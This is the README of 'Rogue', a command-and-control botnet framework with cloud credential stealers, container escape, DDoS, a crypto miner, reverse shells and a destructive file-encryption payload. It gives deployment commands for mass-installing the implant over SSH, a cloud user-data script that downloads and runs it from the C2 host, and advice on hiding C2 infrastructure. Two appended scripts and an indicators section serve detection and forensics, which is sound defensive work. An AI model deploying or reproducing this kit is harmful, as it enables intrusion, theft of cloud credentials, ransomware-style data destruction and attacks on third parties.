# Rogue Botnet: Building and Understanding a Modular RAT w/C2 Framework

**Rogue** is an educational command-and-control (C2) botnet framework built for ethical hackers, red team operators, and defensive researchers. Version 3.2 introduces cloud-aware implants, provider-specific payloads (AWS, Azure, GCP, Kubernetes), a full web administration panel, and destructive file encryption modules. This is not a toy; it's a professional-grade testing platform that exposes the inner workings of modern botnets.

The project prioritises clarity over obfuscation. Every encrypted packet, every persistence mechanism, and every cloud detection routine is laid bare so you can learn, adapt, and defend.

```text
░▒▓███████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓██████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓████████▓▒░
```

---

## >_ Disclaimer – Read Before Touching Code

Rogue is provided **strictly for educational and authorised testing purposes**. The file encryption payload (`fileransom.py`) is **destructive** – it permanently removes original files during encryption. Cloud exploitation modules (AWS/Azure/GCP credential harvesters, container escapes) must only be used on environments you own or have explicit written permission to test.

**You assume full liability for misuse.** The author grants no warranty and accepts no responsibility for data loss, legal consequences, or system damage.
---

## >_ What's New in v3.2 – Cloud Warfare

- **Cloud-Aware Implant** – automatic detection of AWS, Azure, GCP, Docker, Kubernetes
- **Cloud-Specific Tactics** – persistence and evasion adapted to each cloud provider
- **Cloud Operations Tab** – dedicated web interface for cloud exploitation
- **5 New Cloud Payloads** – credential stealers for AWS/Azure/GCP, container escape, K8s secret stealer
- **Advanced Payload Suite** – process injection, advanced file hiding, cron persistence, competitor cleaner
- **File Encryption Payload** – AES-256 encryption/decryption (destructive)
- **Compound Operations** – `trigger_full_recon`, `trigger_harvest_all`, `trigger_clean_sweep`
- **Ngrok Integration** – automatic tunnel for C2 behind NAT

---

## >_ Installation – Spinning Up the C2

Tested on Kali Linux / Debian (bare metal or VM). Python 3.8+ required.

```bash
git clone https://github.com/ekomsSavior/rogue.git
cd rogue
sudo apt update
sudo apt install python3 python3-pip python3-dev python3-venv -y

# Core dependencies
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput --break-system-packages

# Cloud & advanced features
pip3 install boto3 azure-identity google-cloud-storage kubernetes pyautogui python-nmap secretstorage --break-system-packages
```

If you prefer a venv (cleaner, but who has time):

```bash
python3 -m venv rogue_env
source rogue_env/bin/activate
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput boto3 azure-identity google-cloud-storage kubernetes pyautogui python-nmap secretstorage
```

### Ngrok – Punching Through NAT

```bash
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar -xvzf ngrok-v3-stable-linux-amd64.tgz
sudo mv ngrok /usr/local/bin/
ngrok config add-authtoken YOUR_NGROK_AUTH_TOKEN
```

---

## >_ File Structure – Know Your Arsenal

| File / Directory | Purpose |
|------------------|---------|
| `rogue_c2.py` | AES-encrypted C2 server with web admin panel |
| `rogue_implant.py` | Deployable implant – cloud detection, persistence, fallback |
| `payloads/` | Modular scripts (cloud stealers, DDoS, miner, process injection, file encryption, etc.) |
| `rogue_env/` | Optional virtual environment |

---

## >_ Core Architecture – How the Snake Moves

### AES-256 Encrypted Channel

All traffic between implants and the C2 is encrypted with a shared 16-byte key. Hardcoded in both `rogue_c2.py` and `rogue_implant.py` – for real ops, rotate per engagement.

### Cloud Detection & Adaptation (v3.2)

On startup, the implant probes:

- `http://169.254.169.254/latest/meta-data/` → AWS EC2
- `http://169.254.169.254/metadata/instance?api-version=2021-02-01` → Azure VM
- `http://metadata.google.internal/computeMetadata/v1/` → GCP
- `/.dockerenv` or cgroup entries → Docker / Kubernetes

Based on the detected environment, the implant automatically:

- Chooses hidden directories (`~/.cache/.rogue`, `/var/lib/cloud/.cache`, etc.)
- Adapts persistence (cloud-init user-data for AWS, VM extensions for Azure, startup scripts for GCP)
- Pre-fetches relevant cloud payloads

### Payload Loader

The C2 hosts a simple HTTP server (port 8000). Implants fetch payloads from `PAYLOAD_REPO` and execute them via `run_payload` or `load_payload`.

### Trigger System

Pre-defined triggers like `trigger_mine`, `trigger_ddos`, `trigger_aws_creds` execute built-in or downloaded modules. Triggers can be issued to all connected bots or a single bot (`target `).

### Peer-to-Peer Fallback

If the primary C2 goes dark, implants broadcast UDP discovery packets to locate other Rogue nodes on the same network, then switch to a secondary C2.

### Persistence – You Can't Kill What Keeps Coming Back

The implant hides in `~/.cache/.rogue` and adds a stub to `.bashrc`. Cloud-aware persistence modifies cloud-init, custom script extensions, or Kubernetes cron jobs.
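From the defender's side, the startup probing described above is itself a signal: a legitimate workload queries only its own provider's metadata service, usually from a known agent, whereas a fingerprinting implant walks all three endpoints from a single process. The script below is an added example (not part of the Rogue project) that applies that logic to outbound-connection records. The log line format, the `ALLOWED_METADATA_CLIENTS` allowlist and the sample entries are constructed for this example; a real deployment would feed it normalised EDR, auditd or egress-proxy data.

```python
"""Detect cross-provider cloud metadata fingerprinting in outbound-connection logs.

Added example, not part of the Rogue project. The log format, allowlist and
sample lines below are constructed for illustration.
"""
import re
from collections import defaultdict

# Metadata endpoints the implant probes on startup (as listed in the README)
PROVIDER_SIGNATURES = {
    "aws":   ("169.254.169.254", "/latest/meta-data"),
    "azure": ("169.254.169.254", "/metadata/instance"),
    "gcp":   ("metadata.google.internal", "/computeMetadata/v1"),
}

# Processes expected to talk to their own provider's metadata service
# (assumption: tune this allowlist for your fleet)
ALLOWED_METADATA_CLIENTS = {"cloud-init", "amazon-ssm-agent", "waagent", "google_guest_agent"}

# Constructed record format: one outbound HTTP request per line
LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) pid=(?P<pid>\d+) comm=(?P<comm>\S+) "
    r"dst=(?P<dst>[^: ]+):(?P<port>\d+) path=(?P<path>\S+)$"
)


def parse_line(line):
    """Return the record as a dict, or None if the line does not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(dst, path):
    """Return the provider whose metadata endpoint this request matches, or None."""
    for provider, (sig_host, sig_path) in PROVIDER_SIGNATURES.items():
        if dst == sig_host and path.startswith(sig_path):
            return provider
    return None


def analyse(lines):
    """Group metadata requests per (host, pid, comm) and return a list of findings."""
    probes = defaultdict(set)  # (host, pid, comm) -> providers probed
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        provider = classify(rec["dst"], rec["path"])
        if provider:
            probes[(rec["host"], rec["pid"], rec["comm"])].add(provider)

    findings = []
    for (host, pid, comm), providers in probes.items():
        if len(providers) > 1:
            # No real workload needs AWS, Azure and GCP metadata at once
            reason = "multi-provider metadata fingerprinting"
        elif comm not in ALLOWED_METADATA_CLIENTS:
            reason = "metadata access from non-allowlisted process"
        else:
            continue
        findings.append({"host": host, "pid": pid, "comm": comm,
                         "providers": sorted(providers), "reason": reason})
    return findings


SAMPLE_LOG = [
    # constructed: legitimate cloud-init on an EC2 host
    "2024-05-01T10:00:01Z host=web-1 pid=812 comm=cloud-init dst=169.254.169.254:80 path=/latest/meta-data/instance-id",
    # constructed: one process touching all three providers' endpoints in a row
    "2024-05-01T10:05:30Z host=web-1 pid=4242 comm=python3 dst=169.254.169.254:80 path=/latest/meta-data/",
    "2024-05-01T10:05:30Z host=web-1 pid=4242 comm=python3 dst=169.254.169.254:80 path=/metadata/instance?api-version=2021-02-01",
    "2024-05-01T10:05:31Z host=web-1 pid=4242 comm=python3 dst=metadata.google.internal:80 path=/computeMetadata/v1/",
    # constructed: unrelated outbound traffic from the same process
    "2024-05-01T10:06:00Z host=web-1 pid=4242 comm=python3 dst=203.0.113.10:443 path=/",
    # constructed: an interactive tool on another host reading its own provider's metadata
    "2024-05-01T10:07:00Z host=db-2 pid=991 comm=curl dst=169.254.169.254:80 path=/latest/meta-data/iam/security-credentials/",
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"[ALERT] {f['host']} pid={f['pid']} ({f['comm']}): {f['reason']} -> {f['providers']}")
```

The multi-provider rule is the high-confidence one: it needs no allowlist tuning and fires precisely on the fingerprinting behaviour the implant performs. The allowlist rule catches single-provider access from unexpected binaries and is where most of the per-environment tuning goes.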
---

## >_ Running the C2 – Light It Up

```bash
python3 rogue_c2.py
```

Sample output:

```text
============================================================
ROGUE C2 SERVER - Complete Command & Control
============================================================
[+] Exfil listener started on port 9091
[+] Reverse shell listener started on port 9001
[*] Starting ngrok tunnel...
[+] C2 SERVER IS LIVE!
[NGROK] C2 URL: https://your-subdomain.ngrok-free.dev
[ADMIN] Web Panel: http://localhost:4444/admin
[CLOUD] 5 Cloud Payloads Added
[ADVANCED] 4 Advanced Payloads Added
[FILE ENCRYPTION] System-wide modes: system_test, system_user, system_aggressive, system_destructive
```

Web panel: `http://localhost:4444/admin`

Ngrok tunnel: `https://*.ngrok-free.dev` – implants use this URL.

---

## >_ Deploying an Implant – Own the Box

1. Copy `rogue_implant.py` to the target.
2. Edit these variables:

   ```python
   C2_HOST = 'your-subdomain.ngrok-free.dev'
   C2_PORT = 4444
   PAYLOAD_REPO = "https://your-subdomain.ngrok-free.dev/payloads/"
   SECRET_KEY = b'16_byte_shared_key'  # must match rogue_c2.py
   ```

3. Run:

   ```bash
   python3 rogue_implant.py
   ```

### Mass Deployment – Spread the Plague

**SSH to Linux hosts:**

```bash
for ip in $(cat targets.txt); do
  scp rogue_implant.py user@$ip:/tmp/
  ssh user@$ip "cd /tmp && python3 rogue_implant.py &"
done
```

**AWS EC2 via user-data:**

```bash
cat > user-data.sh << 'EOF'
#!/bin/bash
wget https://your-c2.ngrok-free.dev/payloads/rogue_implant.py -O /tmp/rogue.py
python3 /tmp/rogue.py &
EOF
aws ec2 run-instances --image-id ami-12345678 --user-data file://user-data.sh
```

**Docker container – break the sandbox:**

```bash
docker cp rogue_implant.py container_name:/tmp/
docker exec container_name python3 /tmp/rogue_implant.py &
```

---

## >_ Hosting Payloads – Feed the Horde

The C2 automatically serves payloads from `payloads/` via ngrok.
Manual server:

```bash
cd payloads
python3 -m http.server 8000
```

Ensure `PAYLOAD_REPO` in `rogue_implant.py` points to the correct URL.

---

## >_ Command Syntax – C2 Console

Once bots connect, use `target ` to select a specific bot, or issue commands to all.

| Command | Description |
|---------|-------------|
| `list` | Show connected bots (cloud environment badge) |
| `target 2` | Switch to bot #2 |
| `load_payload mine.py` | Download `mine.py` from HTTP server |
| `run_payload mine.py` | Execute the module |
| `reverse_shell` | Open reverse shell on port 9001 (run `nc -lvnp 9001` first) |
| `trigger_mine` | Execute mining payload on all bots |
| `trigger_ddos ` | Launch DDoS |
| `trigger_aws_creds` | Harvest AWS credentials |
| `trigger_container_escape` | Break out of Docker |
| `trigger_fileransom encrypt /path [password]` | **DESTRUCTIVE** – encrypt files |
| `help` | Show all commands |

---

## >_ Payload Reference – The Sharp End

### Core Payloads (pre-v3.2)

**`mine.py`** – Monero CPU miner (SHA256)
Edit `WALLET` and `POOL`. Real pool required for yield.

**`ddos.py`** – Multi-mode DDoS engine
Modes: `http`, `udp`, `tcp`. Optional Tor routing (`USE_TOR = True`).
**`sysrecon.py`** – System recon (hardware, network, users, processes, defences)
Trigger: `trigger_sysrecon`

**`linpeas_light.py`** – Linux privilege escalation checker
Trigger: `trigger_linpeas`

**`hashdump.py`** – Extract password hashes (`/etc/shadow`, SSH keys, browser creds)
Trigger: `trigger_hashdump`

---

### Advanced Payloads (v3.1+)

| Payload | Trigger | Description |
|---------|---------|-------------|
| `process_inject.py` | `trigger_procinject` | Inject into systemd, sshd, nginx, apache – memory-only |
| `advanced_filehider.py` | `trigger_filehide` | Hide files using extended attributes, dot prefixes, filesystem tunneling |
| `advanced_cron_persistence.py` | `trigger_cronpersist` | Obfuscated cron with randomised schedules, self-healing |
| `competitor_cleaner.py` | `trigger_compclean` | Detect and remove other malware families / backdoors |

---

### Cloud Payloads (v3.2 – new)

| Payload | Trigger | Target |
|---------|---------|--------|
| `cloud_detector.py` | `trigger_cloud_detect` | AWS/Azure/GCP/Docker/K8s fingerprinting |
| `aws_credential_stealer.py` | `trigger_aws_creds` | IAM roles, metadata, `~/.aws/`, env vars |
| `azure_cred_harvester.py` | `trigger_azure_creds` | Managed identity tokens, Azure CLI, service principals |
| `gcp_cred_stealer.py` | `trigger_gcp_creds` | GCP metadata, `~/.config/gcloud`, access tokens |
| `container_escape.py` | `trigger_container_escape` | Docker socket, privilege escalation, mount namespace breakout |
| `k8s_secret_stealer.py` | `trigger_k8s_creds` | Kubernetes secrets, service account tokens, configmaps |

**Cloud detection output example:**

```text
[CLOUD] Provider: AWS (confidence: high)
[CLOUD] Metadata: i-0a1b2c3d4e5f67890, us-east-1
[CLOUD] Adapted persistence: cloud-init user-data
```

---

### Destructive Payload – File Encryption

**`fileransom.py`** – AES-256 encryption/decryption.

**WARNING:** Original files are permanently removed. Recovery requires the exact password.
```bash
trigger_fileransom encrypt /home/user/Documents mySecretPassword
trigger_fileransom decrypt /home/user/Documents mySecretPassword
```

If no password is given, a random 32-char string is generated and saved to `encryption_log.txt` on the target.

---

## >_ Web Interface – Command from the Throne

Access: `http://localhost:4444/admin`

| Tab | Function |
|-----|----------|
| **Active Bots** | List implants with cloud environment badge. Send commands, view queues. |
| **Operations** | Pre-built triggers (recon, cred access, persistence, cloud ops, compound ops). |
| **Payloads** | Browse and load all payloads – cloud, advanced, core. Colour-coded badges. |
| **Advanced** | Process injection, advanced file hider, cron persistence, competitor cleaner. |
| **Cloud Ops** | Dedicated panel: cloud detection, AWS/Azure/GCP harvesting, container escape, K8s secret stealer, full cloud scanner. |
| **Results** | Command output history, filterable by bot ID. |
| **Server Status** | Uptime, ngrok URL, active bot count, payload counts. |

### Cloud Ops – Quick Commands

```bash
trigger_cloud_detect       # Identify environment
trigger_cloud_recon        # Provider-specific intel
trigger_aws_creds          # Steal AWS keys
trigger_azure_creds        # Steal Azure tokens
trigger_container_escape   # Break out of Docker
trigger_k8s_creds          # Harvest Kubernetes secrets
trigger_cloud_scan full    # Metadata + credentials + resources
```

---

## >_ Extending Rogue – Red Team Hardening

The base framework is raw. For real operations, add these layers:

### Obfuscate C2 Infrastructure

- **Redirectors** – Proxy through VPS instances to hide real C2 IP.
- **Domain Fronting** – Abuse CDNs (CloudFront, Fastly) to disguise C2 traffic.
- **Tor Hidden Service** – Host C2 as an `.onion` address.

### Alternative Communication Channels

- **Email (SMTP/IMAP)** – Use a compromised mailbox as dead-drop.
- **Social Media** – Monitor Twitter / Reddit posts for encoded commands.
---

## >_ Emergency Removal & Forensics – Burn It All

If you need to clean a compromised test system:

### General Linux

```bash
sudo pkill -9 -f rogue
rm -rf ~/.cache/.rogue
sudo sed -i '/rogue/d' ~/.bashrc /etc/cron.d/*
```

### AWS EC2

```bash
sudo pkill -9 -f rogue
sudo rm -rf /var/lib/cloud/.cache/rogue*
sudo sed -i '/ROGUE/d' /etc/cloud/cloud.cfg
```

### Docker / Kubernetes

```bash
# Inside container
pkill -9 -f rogue
rm -rf /.cache/.rogue

# If escape succeeded, check host for rogue processes
ps aux | grep -E "docker|containerd" | grep -v grep
```

### IoC Detection – Cloud Environments

- **AWS**: unexpected IMDSv2 queries, new IAM role usage, CloudTrail `GetCallerIdentity` spikes.
- **Azure**: managed identity token requests from unusual source IPs, custom script extension installations.
- **GCP**: metadata API calls, service account key creation.
- **Containers**: `docker.sock` mounts, `--privileged` flag, hostPID sharing.

---

## >_ Final Thoughts – Know Your Enemy

Rogue is a complete educational C2 framework that mirrors real-world cloud-aware malware. By studying its source – from AES encryption and payload loading to cloud metadata harvesting and container escape – you gain the insight needed to defend modern infrastructures.

Do not just run it. Break it. Rebuild it. Add your own payloads. Write detection rules. Then use that knowledge to harden your own systems.

**Clone the repository:**

- [https://ek0mssavi0r.dev/tools/rogue](https://ek0mssavi0r.dev/tools/rogue)
- [https://github.com/ekomsSavior/rogue](https://github.com/ekomsSavior/rogue)
- [https://churchofmalware.org](https://churchofmalware.org)

**Follow the author for more offensive security research:**

- [https://instagram.com/ekoms.is.my.savior](https://instagram.com/ekoms.is.my.savior)

**Remember:** With great power comes great responsibility. Use this tool only in isolated labs or with written authorisation. The author assumes no liability for misuse, data loss, or legal consequences.
*For authorised security testing only.*
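The removal commands in the "Emergency Removal & Forensics" section wipe the artifacts they touch, so anyone who wants to write detection rules or keep evidence should inventory a test box before cleaning it. The script below is an added example, not part of the Rogue project: it checks the locations that section names (`~/.cache/.rogue`, `rogue` lines in `.bashrc` and `/etc/cron.d/*`, `/var/lib/cloud/.cache/rogue*`, `ROGUE` lines in `/etc/cloud/cloud.cfg`, and the `/.dockerenv` marker from the core-architecture section) and records file hashes and line numbers instead of deleting anything. The `root` and `home` parameters and the constructed sample tree built by `build_sample_tree` are assumptions that let it run offline against a mounted image or a throwaway directory.

```python
"""Inventory Rogue persistence artifacts before removal (added example, not project code).

Looks for the paths and markers named in the README's removal section and
records them (hash or line number) instead of deleting them, so evidence
survives. `root` and `home` are assumptions that let the scan run against a
mounted image or a test directory rather than only the live host.
"""
import glob
import hashlib
import os
import shutil
import tempfile


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _grep(path, needle):
    """Return 1-based line numbers in `path` whose text contains `needle`."""
    if not os.path.isfile(path):
        return []
    with open(path, "r", errors="replace") as f:
        return [i for i, line in enumerate(f, 1) if needle in line]


def scan_host(root="/", home=None):
    """Return (kind, path, detail) tuples for every artifact found under `root`."""
    home = home or os.path.expanduser("~")

    def p(*parts):  # rebase an absolute path under `root`
        return os.path.join(root, *[s.lstrip("/") for s in parts])

    findings = []

    # ~/.cache/.rogue: the implant's hidden working directory (hash each file)
    for dirpath, _, files in os.walk(p(home, ".cache/.rogue")):
        for name in files:
            full = os.path.join(dirpath, name)
            findings.append(("hidden_dir_file", full, _sha256(full)))

    # shell and cron stubs the README says the implant adds
    bashrc = p(home, ".bashrc")
    findings += [("bashrc_stub", bashrc, f"line {n}") for n in _grep(bashrc, "rogue")]
    for cron in glob.glob(p("/etc/cron.d/*")):
        findings += [("cron_entry", cron, f"line {n}") for n in _grep(cron, "rogue")]

    # cloud-aware persistence on EC2
    for cache in glob.glob(p("/var/lib/cloud/.cache/rogue*")):
        detail = _sha256(cache) if os.path.isfile(cache) else "directory"
        findings.append(("cloud_cache", cache, detail))
    cloud_cfg = p("/etc/cloud/cloud.cfg")
    findings += [("cloud_init_hook", cloud_cfg, f"line {n}") for n in _grep(cloud_cfg, "ROGUE")]

    # container context: the host needs checking as well
    if os.path.exists(p("/.dockerenv")):
        findings.append(("container_context", p("/.dockerenv"), "inside Docker; inspect the host too"))

    return findings


def build_sample_tree(base):
    """Populate `base` with a constructed sample of the artifacts; returns the home path."""
    def write(rel, text):
        full = os.path.join(base, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write(text)

    # constructed placeholders, not the implant or its real stubs
    write("home/analyst/.cache/.rogue/implant.py", "# constructed placeholder, not the implant\n")
    write("home/analyst/.bashrc", "alias ll='ls -l'\npython3 ~/.cache/.rogue/implant.py &\n")
    write("etc/cron.d/sysupdate", "*/5 * * * * root python3 /root/.cache/.rogue/implant.py\n")
    write("etc/cloud/cloud.cfg", "users:\n  - default\n# ROGUE persistence hook\n")
    return "/home/analyst"


def demo():
    """Scan a throwaway sample tree and return the findings."""
    base = tempfile.mkdtemp()
    try:
        return scan_host(root=base, home=build_sample_tree(base))
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for kind, path, detail in demo():
        print(f"[{kind}] {path}: {detail}")
```

Run it against a live host with `scan_host()` (as root, so `/etc/cron.d` and `/etc/cloud` are readable), or point `root` at a mounted disk image to examine a system offline. The string matches mirror the `sed` patterns in the removal section, so anything this script reports is exactly what those commands would have deleted.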